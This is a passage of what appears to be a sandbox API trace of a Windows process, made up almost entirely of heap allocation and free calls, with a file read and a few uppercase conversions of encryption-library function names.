hHeap=0x8a0000) returned 1 [0173.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0173.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0173.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0173.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0173.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0173.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0173.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0173.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0173.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0173.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0173.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0173.901] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0173.901] ReadFile (in: hFile=0x120, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87efb8*=0xfe17, lpOverlapped=0x0) returned 1 [0173.905] ReadFile (in: hFile=0x120, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0173.905] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0173.905] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0173.905] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0173.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0173.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xfe17) returned 0xa7f018 [0173.906] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0173.907] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0173.907] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0173.907] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0173.907] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0173.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0173.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xfe17) returned 0x9c5598 [0173.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa7f018 | out: hHeap=0x8a0000) returned 1 [0173.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0173.908] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0173.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0173.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0173.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0173.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0173.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xfe17) returned 0xa7f018 [0173.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0173.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa7f018 | out: hHeap=0x8a0000) returned 1 [0173.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0173.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0173.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0173.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0173.909] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.909] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0173.909] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0173.909] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0173.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0173.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0173.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0173.909] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0173.909] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0173.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0173.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0173.917] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0173.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0173.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0173.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0173.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26a8 [0173.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0173.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0173.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0173.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0173.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xfe17) returned 0xa7f018 [0173.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0173.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2788 [0173.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0173.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0173.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0173.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2768 [0173.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0173.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0173.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0173.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27f8 [0173.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0173.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0173.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0173.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9c70 [0173.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0173.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0173.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0173.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0173.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0173.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xfe17) returned 0x9d53b8 [0173.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0173.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0173.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0173.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0173.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0173.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0173.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0173.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0173.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0173.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0173.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0173.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0173.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0173.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0173.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0173.920] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0173.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0173.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0173.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0173.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0173.921] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0173.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0173.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0173.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0173.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0173.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0173.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0173.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0173.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0173.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0173.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0173.921] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0173.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0173.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0173.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0173.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27b8 [0173.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0173.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0173.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0173.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0173.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9b50 [0173.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0173.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0173.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0173.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0173.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0173.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0173.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0173.922] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0173.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0173.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0173.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0173.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0173.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0173.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0173.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0173.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0173.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0173.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0173.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0173.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0173.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0173.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0173.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0173.923] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0173.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0173.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0173.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0173.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0173.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0173.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0173.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0173.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0173.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0173.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0173.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0173.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0173.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0173.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0173.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0173.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0173.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0173.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0173.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0173.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0173.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0173.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0173.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0173.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0173.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0173.924] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0173.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0173.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0173.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0173.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0173.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0173.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0173.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0173.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0173.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0173.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0173.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0173.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0173.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0173.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0173.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0173.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0173.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0173.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0173.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0173.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0173.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0173.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0173.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0173.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0173.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0173.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0173.925] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0173.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0173.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0173.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0173.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0173.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0173.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0173.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0173.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0173.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0173.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0173.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0173.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0173.925] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0173.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0173.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd750 [0173.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0173.926] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0173.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0173.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0173.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0173.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0173.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0173.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0173.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0173.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0173.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0173.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0173.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0173.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0173.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0173.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0173.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0173.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0173.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, 